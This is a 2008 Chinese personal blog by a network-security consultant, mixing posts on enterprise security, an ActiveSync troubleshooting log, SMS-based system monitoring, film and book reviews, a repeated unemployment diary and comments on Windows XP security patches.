很多企业以为安装了防病毒系统,就没事了。其实,企业因为信息化方面造成的损失,病毒还是比较弱的,最厉害的,针对企业有目的性的网络入侵。
先说说病毒问题。
企业如何防范病毒对业务系统的影响?杀毒软件只是一个工具,更重要的,企业要有网络方面的安全管理,要有流程落实,要有安全策略。大部分的企业,尤其生产经营性的企业,可能要占到90%
以上,根本没有完整有效的安全策略。企业内的信息中心,往往只有几个人,每天为一些系统维护等一些琐事疲于奔命。没有足够的时间研究技术,更没有足够的精力关注网络安全,网络中是否被人入侵,机密信息是否外泄。
当说到,再遇到病毒的时候,如何有效防范呢?我略顿一下,说:
需要从两个方面解决:1.建立有效的管理流程。比如针对网上操作行为的规范,发现异常时如何应急响应,如何报告,如何控制......2、技术上,要进行网络状态的监控、流量的监控,在预算有限的情况下,可以免费使用我们提供的防病毒网关、流量监控工具等,另外,对于如何分析数据包、手工查杀病毒等进一步的技术问题,可以请外部公司,进行专业技术培训,或者建立良好合作关系,在遇到一些紧急情况时,进行求助。
总之,要建立有效的安全策略,针对自身实际情况,建立有效的信息资产控制和管理。在技术上,不断进步,在水平有限的情况下,求助于更加专业的安全公司,比中我们,呵呵。

现在的网络攻击,或者称之为网络恶意行为,主要分为两种:1、针对个人用户,盗取网游账户、股票账户、银行卡账户;2、针对企业、政府等,进行入侵渗透,盗取机密,搜集数据(尤其是这个容易被人忽略),控制资源。
现在的网络攻击,更多带有利益驱动,纯粹显示技术能力的攻击,也会很快利用到利益事件中。比如做出一个技术革新的木马、病毒,很快就可以在上述领域见到活跃的身影。

今天来的这家企业,在国内某个领域独一无二,在国际上也很有竟争力。他们的研发中心,从外部网络很容易,就可以进入。在外部网络上,有许多办法,可以进入他们的财务、ERP、pdm、SAP系统。而在这之前,他们很少关注,更没有经常性地进行安全评估、渗透测试、检查系统,大量的磁盘空间里,快速运行的CPU和内存中,有些什么代码呢?
企业越来越依赖于信息技术,依赖于网络,一旦出现问题,还是很容易计算出损失的。比如,受此影响,两天里,可能有如下损失:
有许多人员无法正常工作
材料无法出库
车间无法运转
项目可能会延期,后期需赶期
有些订单没有订上,影响业务
发货受影响,资金积压。。。。。。。。。。

这是我作为一个外部人员,暂时想到的,要是企业老总和下面的员工,感受可能会更加丰富吧。所以说,这就是我们工作的价值所在吧。
不要玩虚的,能真正解决客户面临的问题,才是真正有价值的服务。

2008年11月11日星期二

3G应用

从另一个意义说,我早就用上3g应用了。

手机上网,通过数据线,或红外,或蓝牙,或wifi,每天从网上自动抓取我需要的内容和数据,找到需要的东西了,就自动提醒一下,非常方便。
还有包月的cdma1x上网。不过国内不知道什么时候才会开通EVDO,据说速度可以达到几Mbps,暂时享受不到这个服务了。只能通过上面的方式上网。

有时需要使用笔记本通过手机上网,也可以通过红外、蓝外、wifi或数据线的方式。尤其是需要发几条短信的时候,在笔记本上面,还是很方便的。

恩,就这样吧,手机的事告一段落,还有许多正事没干完呢。

activesync无法同步,ppc无法连接电脑,手机不能同步,ppc 无法建立 PC 与设备的连接

activesync无法同步,ppc无法连接电脑,手机不能同步,ppc 无法建立 PC 与设备的连接

只所以用这么长的名字,表达同一个意思,就是因为手机不能同步,折腾了两个晚上才解决,用上面那些关键字,搜索出来的文章,大部分都是一样,都是互相抄来抄去。许多人照些那些技巧操作,最后都无法解决问题。大部分最后采用了什么办法呢?就是硬启,重新灌系统。
完全照搬文章的指导,只能得到一个绝望的结果。凡事还得靠自己。其实一切复杂的背后,都有一个简单的原因。最后,我只是观察了在连接过程中的变化,就找到了根源,很快把问题解决了。解决问题,关键要自己思考,观察一切变化中的异常。
折腾的这两个晚上,我首先根据网上的文章,总共尝试了如下的方法。
我做过以下努力:
1、关闭防火墙,杀毒软件,以及一切与安全相关的工具,如金山毒霸、360安全卫士等一类,并且在防火墙相关的设置中,加入了activesync需要的一系列端口。这些端口列表,在稍后给出,也可以在微软的站点上找到。
Inbound TCP:
990
999
5678
5721
26675
Outbound UDP:
5679 "
2、多次重装同步软件,多次电脑重启,多次手机重启。而且重装和重启的步骤,尝试每次都不同。有时连线,有时断线后重启重装,有时重装到不同目录。而且换机器装。
3、换另一个USB接口,担心电压不够。而且也换另一台机器相连。
4、电脑属性-设备管理器-通用串行总线控制器-电源管理,禁用了节电模式。
5、尝试了移动U盘功能,电脑可以识别2G的移动设备(miniSD卡),数据线应该正常。
6、手机 设置-连接-由USB连接到PC,去掉了"启用高级网络功能"那个勾。
7、电脑 控制面板-管理工具-服务 DHCP Client 已启动。
8、在电脑的网络连接里,关于手机那个设备标识连接中,把TCP/IP协议.网络客户登录等协议都选上。其实默认是选上的。
9、连接手机时,我的电脑里多出一个手机图标,名字是4个字符的乱码(重装系统后知道原来是"移动设备"),断开后,重启电脑,图标一直不消失。
10、现在不管怎么重启电脑和手机,右下角的图标一直是灰色,不会变成转动的绿色,不会自动搜索设备,永远显示"无合作关系"、"未连接"、"正在连接"、"无法连接"、"不能同步"、"无法同步"等,最后却没有任何响应。
11、使用使用memid重建队列后,一直提示"正在连接",却没有任何响应
12、有时想去掉"启用高级网络功能",提示无法取消。这个问题是是蓝牙引起的,通过删除接收或发送port,现在又可以取消高级网络功能了。
13、修改ppc的注册表。有的手机能连接,但一会儿就断开,可以尝试如下如地方的注册表
在ppc 的注册表中,加入如下键值:
注册表位置: [HKEY_LOCAL_MACHINE\Drivers\USB\FunctionDrivers\RND IS]
添加值项: MTU
值类型: DWORD
数据: 1514 (decimal)
注册表位置: [HKEY_LOCAL_MACHINE\Drivers\USB\FunctionDrivers\RND IS]
添加值项: MaxOutTransfer
值类型: DWORD
数据: 1642 (decimal)

14、修改设备名:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows CE
Services\Partners,改设置->系统->关于->设备标识->设备名,再重试
15、使用蓝牙(红外)方式同步,可以看到验证用户,连接,再同步,在同步这一项上,仍然显示"正在同步",睡了一觉回来再看,还是这样的显示界面。
16、修改ppc的注册表,使其用dhcp得到ip
HKEY_LOCAL_MACHINE\Comm\RNDISFN1\Parms\TcpIp
Change
EnableDHCP=1
to
EnableDHCP=0
16、使用mem maid重建通知队列和activesync同步队列,看不到效果
17、重装了activesync数遍,每次都是重启。在另一台机器上安装后,故障同样。看来,问题主要出在手机上面。最近改动比较多,记不清了。
18、dhcp已经自动启动。应该不是PC上的问题。手机上的问题,该如何调试呢?

进行到这一步,没有几个人不会绝望吧?网上的信息,浩如烟海,太多了,根本看不过来,用google搜关键字,ppc activesync
error,太绝望了。还是动自己的脑筋吧。
经过上面几次,也换了机器安装activesync,可以断定,错误出来ppc手机上面。坚决不能硬启,当时折腾cdma
EVDO的时候,就已经费一通劲了。当时折腾的步骤好像也发在blog上面了,但现在想起来,似乎用手编改了好多地方,也记不清了。当时别人搞不定,才让我捡了个便宜。但,手机上出现问题如何调试呢?
先看看里面有哪些变化的东西。
插上USB线,电脑上首先出现一个"网络连接",多了一个windows
mobile的网络连接,然后activesync开始同步。手机上呢,有个用户验证的过程,登录后,就没有下文了。整个过程,和VPN用户的登录过程非常相似。看来,手机同步的过程,就是一个虚拟的VPN登录过程。首先建设网络接口,再而同步数据。
先看看网络接口连接这一步有没有问题。
在电脑上,查看新建立的网络连接,ip为 169.254.2.2,猜测ppc应该为 169.254.2.1,ping一下,果然通了。不错,第一步有回应了。
到ppc手机上面,找到开始,设置,连接,无线局域网,在左下角的菜单中,找到网卡一项。设置网卡里面的每个设备类型,把所有的ip,改为自动获取,再将usb中的高级网络功能去掉,重新连接后,OK.终于可以同步了。
看来,还是要相信自己。解决问题的思路,是警觉整个事件变化有哪些,引起这些变化的因素有哪些?里面有异常吗?导致这些异常会有哪些可能?沿着这条线索,就能找到问题的根源。
和解决其它问题一样,寻找答案的过程,非常繁琐。但最后找到答案后,再回头一看,其实走了许多弯路,只要有好的思路,思考问题的好方法,我们解决问题的过程,本来应该可以更快捷一些。
碰上这么个麻烦事,也并不一定是坏事,我不就从这儿收获了许多吗?这样想下来,眼前的困难,都是财富。

2008年11月8日星期六

业务网络系统的短信监控,某高校的ssl vpn设备捐赠

先说说第一个,业务网络系统的短信监控
短信监控是个非常好的应用,方便快速。
可以用到哪些方面呢?举几个案例来看。
针对网站、OA、网络监控、ERP等都有许多丰富应用。比如网站,可以监控网站的httping值,响应时间、响应速度、是否中了网站木马,是否中了病毒,是否被黑,网页是否被串改,网站的单位时间访问数是多少、当前用户数是多少、ip分布规律。结合我以前完成的一个监控工具,可以监控一个地区的网站,及时发现有没有攻击事件,事件频率,攻击来源等诸多有用的特征。其它几种应用,都有类似。使用短信监控,可以及时报警,最快速度地处理问题。
以前实现的短信监控,都是通过通过串口或usb挂一个gsm猫(有的用专用短信号,费用更高,需要到运营处申请),在设备里放一个sim手机卡生成短信,一条一毛钱,一段时间下来,算下来可不少钱呢。
现在有了更好的方法,可以一分钱不用花,就可以用短信监控了。用移动飞信类似的东西,就可以很好地实现。只不过飞信没有开放api,需要自己抓包分析。还算好,比QQ的包要容易些。好处是,一分钱也不用花了,短信的发送完全是免费的。只要上好了平台,就可以不用考虑短信的成本问题了。
其实除了短信监控,用机器所连的modem进行语音、传真报警都非常容易实现。在linux下,使用几句话的脚本,直接
atd某个号码就可以了。是不是很容易?除了短信、语音,其实,还可以使用QQ/msn/skype/gtalk等一大堆的im工具,提供种类繁多的报警界面。现在,先实现短信和语音。其它im已经有人开发了大量的第三方应有,相信咱们可以学到很多经验,应该可以搞定的。
恩,刚才站桩时想了很多,急着跑回来,现在又似乎忘了许多东西。对,还有个应该着重提一下,接到短信,或其它种类的报警,都是可以互动的,比如回复短信,或回电操作,可以在监控平台上完成许多操作。比如OA这样的办公自动化平台,可以使用回复,完成一个公文的查阅和批复。
还有什么来着?还真是想不大起来了。以后再写。

另一件事,为某高校,提供我们自己开发的ssl vpn设备,免费赠送,象免费赠送安全设备给我们的客户一样,为山东高校一些应用提供ssl
vpn设备,可以解决OA和电子资源,在校外网络的应用问题,可以很好地解决速度和安全问题。有兴趣的朋友,请与我联系。

2008年11月6日星期四

国家机密

看完了《国家机密》,感觉故事编写的不错。但文笔似乎一般。
乐手的死,引出一个主线索,一颗痣,没想到最后的名字,竟然是易克智。
中间为了追查一颗痣代表的意义,怀疑了好几个人,也追查出了不少事情
八所丢了资料,找出一人惯偷。刚要追查,小偷头子意外死亡。引出八所内部的间谍,无面人
一个可疑对象,张铨意外死亡,却因此留下许多疑点,最终破了此案,抓到无面人,此案破解

但上面的影子计划,只是jim安排的一系列间谍行动。接迎一直在jim集团做卧底的"乐手",出现意外情况。乐手临终前,说了句"一颗痣"。

中间有中间回家,同学聚会,都是伏笔。老爸的易家菜绝技,同学聚会碰到老同学王跃龙。还有相对象的小菲。

再去动力所卧底。追查出了袁工及其儿子。追着泄露的火箭推进原料这个线索,找出了更多的隐藏。由袁工,找到谢韵,可惜因其自杀线索中断。中间出现一个美女老总金梦。发现在谢韵的交货过程中,出现过此人的女扮男装的身影。于是,为了挖出背后更大的鱼,决定到金梦的公司卧底。后半部分,基本是这个公司的描写。卧底的危险性和智慧较量,占了故事的大半部分。
首先是接近,凭借已有资源,显示出自身价值。进入后,有效利用现有关系,取得最大信任。在各种试探中,保持冷静,不急不燥,最后比拼演技,布下一个个局中局,最后抓获大头。

2008年11月4日星期二

天才巨星李小龙

          看了《李小龙传奇》。电视拍的不一定水平高,但却让人感慨万千,感动于李小龙的鲜明个性,率直、敢做敢当、黑白分明、努力进取。
         才二十来岁,一个人在美国,竟然能取得那么大的成就,真是不容易。
          咱们在那个年龄,还在到处寻找帮助,向父母要钱,没有生活来源,连自己都养不活,更对这个世界的认识肤浅,事业上更是毫无建树。真是没法比呀。这样的成功是怎么得来的?
      真羡慕,李小龙在学习武术的过程中,那么多的良师益友。在香港,有叶大师有好师兄,也有宽容的王云生;到了美国,有木村的帮助,有那个什么度教授,中间还认识了很多其它的朋友。要做成一番事业,良师益友是不可缺少的,要有可以交流的圈子。
看完了李小龙传奇,想法很多。
        许多人都在异乡奋斗 。李小龙更是在美国,背井离乡,竟然取得这么大的成功。对中国武术稍有了解的人都知道,武术里有许多玄之又玄的东西,比如内功,比如传说,比如。。。从这个角度,李小龙的武功没法肯定是最高的,但他创立的截拳道,一定是最有进取力的武术思想。这种思想可能不是最伟大,可能无法达到老子的道德经,孔子的论语一类的高度,但这种进取心却前所未有,让人感觉很是震憾、感动。许多人,在陌生的城市买了房,娶了媳妇,有了一定事业,收入,圈子,经过了多少辛苦,心里多少苦闷。看《李小龙传奇》,尤其是一个人打拼的那种经历,一定会有共鸣吧。
       晚上,又看了《猛龙过江》。这么好的片子,竟然是李小龙自导自演,并且是自己写的剧本?武学上能达到那种高度,想法在文艺方面,竟然也是天才中的天才。谁说李小龙狂妄自大?看看《猛龙过江》里面,他其实对中国人自古的一些劣根性,描述的很清晰。里面那个娘娘腔的翻译,还有最后暴露狰狞面目的王叔,这几种人,在许多地方不是很有代表性吗?娘娘腔一类,对外奴颜婢膝,对内装腔做势仗势欺人,看到了吧?给老板出点的时候,显的多有智慧呀?有些国人的智慧,许多时候就是表现在这个时候。还有那个王叔,作恶都有充分的理由,都是别人的责任,而且隐藏的很好,关键时候,背后来一刀。许多时候,愤青们都在郁闷地想,中国还有希望吗?多少年来,经济发展了,物质丰富了,但一些人想事做事的思维习惯,变了多少呢?有多少丑恶,就藏在一个个冠冕堂皇之中呢?
        为什么李小龙是绝无仅有的?想想,这样的个性,这样的天才,能活的安稳吗?很快就被北京来的交通部高官禽兽林给灭了吧?即使不灭,也会被足协/体育总局一类型机构,打压的抬不起头来。躲的了这样的官,也躲不了黑社会。现实中,还不是得罪了一帮收保护费,就只能远走他乡了。所以,做人,真的要内方外圆,尤其是这样的现实。但即使圆滑了,就不会得罪人了吗?许多时候,不一定你做了什么,只是因为你的存在,就会受到责难。那个谁不是喊了句啥来着?"谁让你不幸生在中国"!!!!操他妈的,我爱这个国家。我无法选择出生,无论如何,我爱这个国家。

2008年10月29日星期三

经济危机下的幸福生活

经济危机下的幸福生活


   美国华尔街的金融危机,愈演愈烈。虽然还没有对中国造成很多的冲击,但对我们这些中小私人企业的打工一族,还是立即看到了影响。公司没了,失业了,没收入了。没钱没收入的日子真是痛苦,但经过一段时间,也发现了很多乐趣。
        每天无所事事,时间完全自己掌握。计划着发挥自己所长,注册一个公司提供网络安全服务,于是注册了合拍科技有限公司,为人提供渗透攻击测试、风险评估、加固防护、黑客追踪一类的服务。刚开始活不多,每天早上晚上,都在想着一天的时间怎么打发。干活,想干多少就干多少;看书,看累了就去打会儿篮球;看电影,周一到周三都有优惠,可以用半价到电影院去欣赏电影。最近几部很好看的国产片子:画片、即日启程。感觉比以前的国产大片好看多了,没想到失业后,看着电影也比以前好看多了。时间上的自由了一段时间,有时挺迷茫,不知道该干些啥了。没人在后面催着,感觉不到一点儿紧迫,睡觉睡到手抽筋,数钱数到自然醒,一切随心由性,想干啥干啥。堕落了一段时间,整天看电影到深夜,"免费"做渗透测试到凌晨,也是累个够呛。和以前的生活差别太大了。老是过这样的生活,感觉太堕落,于是制定计划:

22:30前,搂着小宝宝睡觉
5:30 起床,操场跑三圈
5:50-7:00 看书
7:05-7:30 玩篮球
8:00 吃饭
9:30-18:00 图书馆看书、商务操作、写下网络安全的攻击与防护心得、整理案例
19:00 看书
19:30-22:30 看书,陪小宝宝玩,然后睡觉。睡前操场跑三圈,站桩15分钟

          这样下来,还真是神清气爽,感觉还挺有成就感。再也不用赶工熬夜了,再也不用推杯唤盏了,再也不会腰酸背疼腿抽筋了,有规律的生活,比什么灵丹妙药都管用。时间上的自由,让自己感觉第一次做了自己的主人,可以随心所欲地生活。
       衣服只要干净就行。不用穿的那么正式,随便拿一件套上,穿上休闲鞋,随时可以跑到体育场打俩场篮球。典型的行头,上下一身的运行服,提着thinkpad电脑包,转悠于篮球场和图书馆之间。
几个图书馆之间都转遍了,不能不提一下我的交通工具。无论走到哪儿,都会有人问一下,这是从哪儿买的?速度很快,可以超过时速50,最快时比摩托车还快,到哪儿去都是一眨眼的功夫。而且还能健身,比每天去健身馆还要管用,没多长时间,腹肌又重新回来了。当当当,现在隆重推出:我的改装山地电动车,普通一辆山地车,再加上电机、电池、控制器,就成了一辆既有速度又能健身,一级棒的操控性,骑上去和F1赛车一样爽的神车。另外,还要特别提一下,电池太牛了,虽然只有36V,但不用每天冲电,在一天到晚骑着到处转悠的情况下,电池可以用三四天,是不是强到和手机似的?没有哪个电动车可以这么厉害吧?因为在低速时很少用电,下坡时,关掉电比平常跑的还快,上坡时用最少的电蹬着车子,感觉非常轻,象逃跑的泥鳅吱溜一下就跑没影了。看着街上那些漂亮的小汽车,我也阿Q式地自我解嘲起来,还是我的车子最实用,到哪儿都能最快到达,几天充一次电,最高功率充电80w*3小时 = 0.24度,再*0.5元约等于1毛多钱,这可是几天才1毛多钱啊!现在1毛钱能买啥呀?而且,没有养路费和各式保险,也没有各种过路费和不可遇知的风险。话说学车的时候就已知道,现在有车的都是弱势群体,到哪儿都受气挨欺负,还得交这个花那个的。唯一好处就是提高社交圈,挡风遮雨。咱这车最起码先把最重要的第一目标实现了,除了上高速没法比,在城市里比小车快多了,指哪打哪,能近能远。昨天花1块钱,去五金店买了零件若干,把车子做了下升级。哪天锂铁电池便宜了,燃料电池商用了,再升级换代,准备再骑个三五十年。
      因为有了山地电动车的帮助,可以很快就到达想去的任何地方。跑到附近的农贸市场了。买了一袋今年刚出的小米。熬出粥来,吃的我又哭双笑。一袋新小米,一百来块钱,一个冬天都吃不完,那味道好的,比几百块钱一桌的酒菜,几十块钱一杯的咖啡还棒,浓香、温暖、回味无穷。玉米花生,青菜萝卜,海鲜水货,各式的农产品,吃一周也不过百多块钱,而且味道比饭馆的更香更纯正。有了这五谷杂粮的养育,嘿,瞧咱这身体,牙也不疼了,腿也不痒了,腰也不酸了,脸也有光了,这生活质量,比挣那点工资累的脸色发青时可强多了。
     失业了,也不用出差了。在家呆着,睡在自家干净的纯棉被单上,心里踏实无比。再也不会被半夜的骚扰电话叫起,"先生,您需要特殊服务吗?",也不会看着哪怕五星级酒店,那看似发白的被单下,还有这个那个的故事,展转反侧地睡一觉,醒来总觉的身上发痒。
       时间上自由、行动上自由、穿衣上自由、吃饭更营养、住在家里更踏实,赚钱多少由自己控制,有更多时间跟圈子朋友相聚,看书学习上更方便,有时间看书看电影享受生活了。 失业了,才发现生活中还有这么多的幸福,人生过半,竟然一直忽略。在繁忙的时候,我们失去了观察的眼睛,也失去了各种的自由。还有什么比失去自由更可惜的呢?

经济危机下的幸福生活

经济危机下的幸福生活


美国华尔街的金融危机,愈演愈烈。虽然还没有对中国造成很多的冲击,但对我们这些中小私人企业的打工一族,还是立即看到了影响。公司没了,失业了,没收入了。没钱没收入的日子真是痛苦,但经过一段时间,也发现了很多乐趣。
每天无所事事,时间完全自己掌握。计划着发挥自己所长,注册一个公司提供网络安全服务,于是注册了合拍科技有限公司,为人提供渗透攻击测试、风险评估、加固防护、黑客追踪一类的服务。刚开始活不多,每天早上晚上,都在想着一天的时间怎么打发。干活,想干多少就干多少;看书,看累了就去打会儿篮球;看电影,周一到周三都有优惠,可以用半价到电影院去欣赏电影。最近几部很好看的国产片子:画片、即日启程。感觉比以前的国产大片好看多了,没想到失业后,看着电影也比以前好看多了。时间上的自由了一段时间,有时挺迷茫,不知道该干些啥了。没人在后面催着,感觉不到一点儿紧迫,睡觉睡到手抽筋,数钱数到自然醒,一切随心由性,想干啥干啥。堕落了一段时间,整天看电影到深夜,"免费"做渗透测试到凌晨,也是累个够呛。和以前的生活差别太大了。老是过这样的生活,感觉太堕落,于是制定计划:
晚上10:30前,搂着小宝宝睡觉
早上5:30 起床,操场跑三圈
5:50-7:00 看书
7:05-7:30 玩篮球
8:00 吃饭
9:30-18:00 图书馆看书、商务操作、写下网络安全的攻击与防护心得、整理案例
19:00 看书
19:30-22:30 看书,陪小宝宝玩,然后睡觉。睡前操场跑三圈,站桩15分钟
这样下来,还真是神清气爽,感觉还挺有成就感。再也不用赶工熬夜了,再也不用推杯唤盏了,再也不会腰酸背疼腿抽筋了,有规律的生活,比什么灵丹妙药都管用。时间上的自由,让自己感觉第一次做了自己的主人,可以随心所欲地生活。
衣服只要干净就行。不用穿的那么正式,随便拿一件套上,穿上休闲鞋,随时可以跑到体育场打俩场篮球。典型的行头,上下一身的运行服,提着thinkpad电脑包,转悠于篮球场和图书馆之间。
几个图书馆之间都转遍了,不能不提一下我的交通工具。无论走到哪儿,都会有人问一下,这是从哪儿买的?速度很快,可以超过时速50,最快时比摩托车还快,到哪儿去都是一眨眼的功夫。而且还能健身,比每天去健身馆还要管用,没多长时间,腹肌又重新回来了。当当当,现在隆重推出:我的改装山地电动车,普通一辆山地车,再加上电机、电池、控制器,就成了一辆既有速度又能健身,一级棒的操控性,骑上去和F1赛车一样爽的神车。另外,还要特别提一下,电池太牛了,虽然只有36V,但不用每天冲电,在一天到晚骑着到处转悠的情况下,电池可以用三四天,是不是强到和手机似的?没有哪个电动车可以这么厉害吧?因为在低速时很少用电,下坡时,关掉电比平常跑的还快,上坡时用最少的电蹬着车子,感觉非常轻,象逃跑的泥鳅吱溜一下就跑没影了。看着街上那些漂亮的小汽车,我也阿Q式地自我解嘲起来,还是我的车子最实用,到哪儿都能最快到达,几天充一次电,最高功率充电80w*3小时 = 0.24度,再*0.5元约等于1毛多钱,这可是几天才1毛多钱啊!现在1毛钱能买啥呀?而且,没有养路费和各式保险,也没有各种过路费和不可遇知的风险。话说学车的时候就已知道,现在有车的都是弱势群体,到哪儿都受气挨欺负,还得交这个花那个的。唯一好处就是提高社交圈,挡风遮雨。咱这车最起码先把最重要的第一目标实现了,除了上高速没法比,在城市里比小车快多了,指哪打哪,能近能远。昨天花1块钱,去五金店买了零件若干,把车子做了下升级。哪天锂铁电池便宜了,燃料电池商用了,再升级换代,准备再骑个三五十年。
因为有了山地电动车的帮助,可以很快就到达想去的任何地方。跑到附近的农贸市场了。买了一袋今年刚出的小米。熬出粥来,吃的我又哭双笑。一袋新小米,一百来块钱,一个冬天都吃不完,那味道好的,比几百块钱一桌的酒菜,几十块钱一杯的咖啡还棒,浓香、温暖、回味无穷。玉米花生,青菜萝卜,海鲜水货,各式的农产品,吃一周也不过百多块钱,而且味道比饭馆的更香更纯正。有了这五谷杂粮的养育,嘿,瞧咱这身体,牙也不疼了,腿也不痒了,腰也不酸了,脸也有光了,这生活质量,比挣那点工资累的脸色发青时可强多了。
失业了,也不用出差了。在家呆着,睡在自家干净的纯棉被单上,心里踏实无比。再也不会被半夜的骚扰电话叫起,"先生,您需要特殊服务吗?",也不会看着哪怕五星级酒店,那看似发白的被单下,还有这个那个的故事,展转反侧地睡一觉,醒来总觉的身上发痒。
时间上自由、行动上自由、穿衣上自由、吃饭更营养、住在家里更踏实,赚钱多少由自己控制,有更多时间跟圈子朋友相聚,看书学习上更方便,有时间看书看电影享受生活了。 失业了,才发现生活中还有这么多的幸福,人生过半,竟然一直忽略。在繁忙的时候,我们失去了观察的眼睛,也失去了各种的自由。还有什么比失去自由更可惜的呢?

2008年10月27日星期一

笑点低了

就像10个月的儿子一逗就笑,最近我的笑点也低了,不知是不是因为这个原因,还是国产影片的确拍的好了。最近看了二个国产电影,感觉都非常好看。

《画皮 》,整体上都不错,虽然不会再看第二遍,但作为纯粹的娱乐,让人感觉坐下来欣赏这样一部片子,也算是种享受。具体哪儿好,看过才知道。
《即日启程》,感觉比画皮拍的更好。虽然范伟的特色没有拍出来,但整个故事写的挺逗的,情节安排的挺好,表演也非常真挚,让人看了心底有些感动,有些高兴。

   具体说不上哪儿好,推荐看看吧。

问题出在哪儿了?

2008年10月下旬,国内又出了几件让人深思的事件。

1、几个官员出逃,都跑到法国去了。浙江的几个省管干部去法国考察的时候,跑了,以各种理由不回来了,有的用身体有病无法回国为由,有的以会亲访友为由,逃出不归,还有个上海哪个区的副区长,也是去法国考察期间,溜之大吉。据说有的官,还一直看上去清正廉明的样子 ,只是民间有些传言,说是如何如何,都没有证实的事情,没想到最后的结果,都让人有更多想法了。

   据说,很多领导的子女,都早到国外享受去了,连老婆也不在身边,一个人在国内"努力奋斗"着,无论承担多少风险,最起码老婆孩子先在国外过上贵族般的奢侈生活了。这种官,现在有个专有的名词,称之为"裸官"。当裸官成为一种现象的时候,官员的出逃,也是不奇怪了。但是当腐败成为一种规则的时候,我们的国家还有希望吗?

2、最近几天,还有个新闻,央视名嘴当官。央视的几个知名主持人,现在知道的有三个 ,一个去丽江当副市长,一个去哪儿当区长助理,还有个似乎去共青团中央。为什么这个也成了热点?因为很多人关注着这事吗?一个知名主持人,一下子是如何当上官的?调迁的程序合法吗?再者,咱不考试程序,也得为当地的官员考虑呀。这一下子来个空降军,打破了多少人的按步升迁的顺序和希望啊?多少人又得重新排队了,原来的期望落空,不知要骂多少娘了。
     看看这么多人挤着当公务员,就知道很多人不是为奉献来的,而是为了活的更加舒适,更加有更多的自由,什么物质和精神方面啥 的,想想,家里有个当官的,七大姑八大姨也跟着沾光呀。我们这儿也空降了个幼儿园园长,据说是某书记的司机的外甥媳妇,恩,似乎还不算很远的关系,不过怎么说,此园长在看护小朋友的时候,为了减少小朋友上厕所的次数,禁止喝水,遭家长质疑的时候,还嚣张地说,"不要和小孩那么幼`稚好不好?",所谓一人得道,鸡犬不宁鸡鸡犬升天,只要有机会,谁不想当官呀?

3、还有个事情想不通,在最近几天,据说有6个日本人写来了感谢信。咱可是很少收到外国人给咱写感谢信呀,这个事可非常重要,于是就报道开了。结果,我们从新闻中,不是看到了我们一贯的自豪感,而是让我们有了更多的疑问:为什么日本人为了赶飞机,就可以让中国的火车停开一分钟?我们晚点的时候,有这待遇吗?另外,在下火车后,又安排警车开道,送到飞机场,是不是这些公用财产,国家机器,都可以在某些人的自由意志下,自由处置和安排。

现在看某些新闻,感觉比小说还要有趣,风光 的背后,让人想的更多,疑惑更多,我不知道这一切是怎么出现的,为什么还在源源不断地出现,根源在哪儿?这么多故事一般的真实,为什么是咱中国人源源不断创造出来的?就像制造劣质产品,食品里添加各式各样东西,咱中国人一贯有强大的创造力,难道这也是表现创造力的一个地方?

2008年10月24日星期五

继续补丁着,这个最重要

最近有蠕虫病毒,会感染所有的xp机器,微软紧急火急地推出补丁,编号 KB958644-,赶紧到微软站点去下载吧,最近又有不少的故事发生了,看来是


WindowsXP-KB958644-x86-  635KB

为了应对黑屏,现在许多人对微软的补丁比较谨慎了,该打的补丁也不打了,不过,微软的系统,下来的东西谁知道都有什么作用呀?有几个人会脱壳会ida反汇编去跟踪一番呢?大部分还是持着半信半疑的心理,装也不是,不装也不是。

其实,现在的linux发展的很好了,方便安装,操作起来与windows也差不了多少。用熟悉以后,操作起来很爽,许多操作可以用键盘就做了,非常快和方便。这个熟悉的过程,也非常短,用不了几天,就可以很好地操作了。据说,在有些地方,新学电脑的人,都是用linux,掌握起来比windows快多了。

新手入手,推荐使用ubuntu,非常好用。

用了windows,你知道里面有什么呀?想黑屏就黑屏,想黑你就黑你,微软借助这个widnows平台,比任何黑客都有破坏力,随便就可以操纵任意的系统,即使想拿你机器的文件,想看操作记录,想重启,想怎么样就怎么样,现在虽然网上出现了这么多的黑屏破解,似乎看上去是道高一尺魔高一丈,微软出点什么方案,最后都破解了。其实,在技术者看来,微软只是在执行某种策略,要做到完全控制盗版用户,查看他们的机器,文件,权限。。。。都是很容易做到的。不在这个行业不知道,实际上,现在的cmos,硬盘微码,电池,光驱。。。。这些里面,都可以放进rootkit,就是木马或者说后门,都是很容易做到的。个人技术者都可以很容易地实现,绝对不要低估了微软的技术实力,他们做类似的东西,还不简单?

上了贼船,再下就难了。盗版的权当盗着,但这船啥时候会翻,谁也说不准,未雨绸缪,赶紧熟悉liunux吧,总有一天用的着。而且,用linux,会过快乐的生日,好比开车和自行车, 你的体会会很是不同,会省出不少工作力,干自己更专注的事情。想想呆在电脑前的时间,和呆在车里的时间,linux只会让你更有收获,更加快乐。

又打了一堆补丁

早上一开机,机器上的auto update自动打开了!以前都是手工升级,只显示升级提示的,看来昨天晚上的补丁还在继续着,只下载了还没有补完。

虽然系统是原装正版的,买thinkpad自带的,但最近的微软黑屏行动,也可能误伤正版用户,黑屏提示里不是有吗?"您可能是盗版软件的受害者。。。。"微软这样的公司,上升到这样高度的智力,措词一向圆满,滴水不漏

过一会儿,系统就提示,让我重启机器,查看了今天升级的补丁,共有两个:编号为kb956841和kb954211,也有可能是最近几天的几个xp非常严重的漏洞,打开微软的链接,想查查这两个编号的漏洞信息,看看是微软搞的正版验证,还是漏洞,半天了一直打不开相关页面,还真是神奇,这样的时刻,微软的网站反而不能访问,平时倒是挺快的。没办法,还是google吧。
 

今天升级的两个东东,看看是什么东东。第一个:

虚拟地址描述符操作中的漏洞可能允许特权提升 (956841)
发布日期: 十月 14, 2008
摘要
此安全更新可解决虚拟地址描述符中一个秘密报告的漏洞。 如果用户运行特制的应用程序,则该漏洞可能允许特权提升。 成功利用此漏洞并经过身份验证的攻击者可以在受影响的系统上获得特权提升。 攻击者随后可安装程序;查看、更改或删除数据;或者创建拥有完全管理权限的新帐户。

对于 Windows XP、Windows Server 2003、Windows Vista 和 Windows Server 2008 的所有受支持版本,此安全更新的等级为"重要"。
此安全更新通过修改虚拟地址描述符处理内存分配变量的方式来解决该漏洞。

第二个::
Windows 内核中的漏洞可能允许特权提升 (954211)
发布日期: 十月 14, 2008
摘要
此安全更新可解决 Windows 内核中一个公开披露和两个秘密报告的漏洞。 成功利用这些漏洞的本地攻击者可以完全控制受影响的系统。 匿名用户无法利用这些漏洞,也无法以远程方式利用这些漏洞。

对于 Microsoft Windows 2000、Windows XP、Windows Server 2003、Windows Vista 和 Windows Server 2008 的所有受支持版本,此安全更新的等级为"重要"。
